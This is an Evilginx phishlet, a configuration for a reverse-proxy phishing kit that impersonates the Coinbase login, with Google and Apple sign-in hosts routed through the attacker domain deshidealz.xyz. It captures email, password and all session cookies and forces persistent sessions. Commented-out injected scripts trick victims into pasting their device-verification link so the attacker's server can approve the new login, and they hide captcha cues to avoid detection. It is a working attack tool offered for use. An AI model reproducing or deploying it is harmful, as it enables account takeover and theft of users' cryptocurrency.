name: "Coinbase"
author: "Simpler Hacking"
min_ver: "3.2.0"

proxy_hosts:
  - {
      phish_sub: "login",
      orig_sub: "login",
      domain: "coinbase.com",
      session: true,
      is_landing: true,
      auto_filter: false,
    }
  - {
      phish_sub: "coinbase",
      orig_sub: "coinbase",
      domain: "com",
      session: true,
      is_landing: false,
      auto_filter: false,
    }
  - {
      phish_sub: "as",
      orig_sub: "as",
      domain: "coinbase.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "sessions",
      orig_sub: "sessions",
      domain: "coinbase.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "google",
      orig_sub: "www",
      domain: "google.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "gstatic",
      orig_sub: "www",
      domain: "gstatic.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "api-sprig",
      orig_sub: "api",
      domain: "sprig.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "accounts-google",
      orig_sub: "accounts",
      domain: "google.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "appleid",
      orig_sub: "appleid",
      domain: "cdn-apple.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "appleidd",
      orig_sub: "appleid",
      domain: "apple.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "www-apple",
      orig_sub: "www",
      domain: "apple.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "iforgot-apple",
      orig_sub: "iforgot",
      domain: "apple.com",
      session: true,
      is_landing: false,
    }

sub_filters:
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "{hostname}"
    replace: "{hostname}"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://{hostname}"
    replace: "https://{hostname}"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "coinbase.com"
    replace: "{hostname}"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://coinbase.com"
    replace: "https://{hostname}"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://as.coinbase.com"
    replace: "https://as.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "as.coinbase.com"
    replace: "as.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://www.google.com"
    replace: "https://google.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "www.google.com"
    replace: "google.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://www.gstatic.com"
    replace: "https://gstatic.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "www.gstatic.com"
    replace: "gstatic.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://sessions.coinbase.com"
    replace: "https://sessions.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "sessions.coinbase.com"
    replace: "sessions.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://api.sprig.com"
    replace: "https://api-sprig.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "api.sprig.com"
    replace: "api-sprig.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://accounts.google.com"
    replace: "https://accounts-google.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "accounts.google.com"
    replace: "accounts-google.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://appleid.cdn-apple.com"
    replace: "https://appleid.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "appleid.cdn-apple.com"
    replace: "appleid.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://appleid.apple.com"
    replace: "https://appleidd.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "appleid.apple.com"
    replace: "appleidd.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://www.apple.com"
    replace: "https://www-apple.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "www.apple.com"
    replace: "www-apple.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "https://iforgot.apple.com"
    replace: "https://iforgot.apple.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]
  - triggers_on: "login.coinbase.com"
    orig_sub: "login"
    domain: "coinbase.com"
    search: "iforgot.apple.com"
    replace: "iforgot.apple.coinbase.deshidealz.xyz"
    mimes:
      [
        "text/html",
        "application/binary",
        "image/x-icon",
        "application/x-www-form-urlencoded",
        "text/plain",
        "application/json",
        "application/javascript",
        "application/x-javascript",
        "application/ecmascript",
        "text/javascript",
        "text/ecmascript",
      ]

auth_tokens:
  - domain: "www.coinbase.com"
    keys: [".*,regexp"]
auth_urls:
  - "/dashboard"
  - "/dashboard/.*"
credentials:
  username:
    key: "email"
    search: "(.*)"
    type: "post"
  password:
    key: "password"
    search: "(.*)"
    type: "post"

force_post:
  - path: "/sessions"
    search:
      - { key: "email", search: ".*" }
      - { key: "password", search: ".*" }
    force:
      - { key: "stay_signed_in", value: "1" }
    type: "post"
  - path: "/signin_step_two"
    search:
      - { key: "token", search: ".*" }
      - { key: "phone_number_id", search: ".*" }
    force:
      - { key: "remember_computer", value: "1" }
    type: "post"

login:
  domain: "login.coinbase.com"
  path: "/signin"
# "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better.
# "function ValidateLink()" will replace the domain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link.
#  In that way we will be able to successfully authenticate the new device login.

# "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user.

# js_inject:
#   - trigger_domains: ["www.coinbase.com"]
#     trigger_paths: ["/device_confirmations/new"]
#     trigger_params: [domain]
#     script: |
#       function lp(){
#         var elem1 = document.getElementsByClassName("account-inner")[0];
#         elem1.parentNode.removeChild(elem1);
#         var elem2 = document.getElementsByClassName("device-support")[0];
#         elem2.parentNode.removeChild(elem2);
#         var div = document.createElement('div');
#         div.className = 'account-inner';
#         div.innerHTML = `
#         <img class="account-icon" src="https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png">
#         <div class="account-icon"></div>
#         <h2 class="account-header">Authorize This Login</h2>
#         <p>Copy The Verification Link Received in Email And Paste It Below To Verify The Login </p>
#         <form action="">
#         <fieldset>
#         <input type="url" name="linkVerify" id="linkVerify" placeholder="https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx" pattern="https://.*">
#         <input class="btn" type="button" value="Verify Device" onclick="ValidateLink()">
#         </fieldset></form>
#         <p></p>
#         `;
#         document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
#         var div = document.createElement('div');
#         div.className = 'device-support';
#         div.innerHTML = `
#         <p>Email didn't arrive?</p>
#         <p>Visit our <a href="https://support.coinbase.com/customer/portal/articles/2521789">Support Center</a>.</p>
#         <p></p>
#         <p>
#         <a href="/email_recovery/new">
#           I no longer have access to my email address
#         </a>      </p>
#         `;
#         document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
#         return;
#       }
#       function ValidateLink(){
#         var domain = "{domain}"
#         var link1 = document.getElementById("linkVerify").value;
#         var link2 = link1.replace('coinbase.com', domain);
#         console.log(link2)
#         window.open(link2, '_blank').focus();
#       }
#       setTimeout(function(){ lp(); }, 2500);

# HCAPTCHA Header That shows domain name can be Replaced dynamically with javascripts, Its Disabled Here Because Its resulting in Hcaptcha error, Find your ways to solve it.
#
#  - trigger_domains: ["www.coinbase.com"]
#    trigger_paths: ["/signin","/signin*"]
#    trigger_params: []
#    script: |
#      function hcaptcha(){
#        var elem = document.getElementsByClassName("cf-subheadline")[0];
#        elem.parentNode.removeChild(elem);
#        var div = document.createElement('div');
#        div.className = 'cf-subheadline';
#        div.innerHTML = `
#        <h2 class="cf-subheadline"><span data-translate="complete_sec_check">Please complete the security check to get access to</span> Coinbase Website</h2>
#        `;
#        document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div);
#        return;
#        }
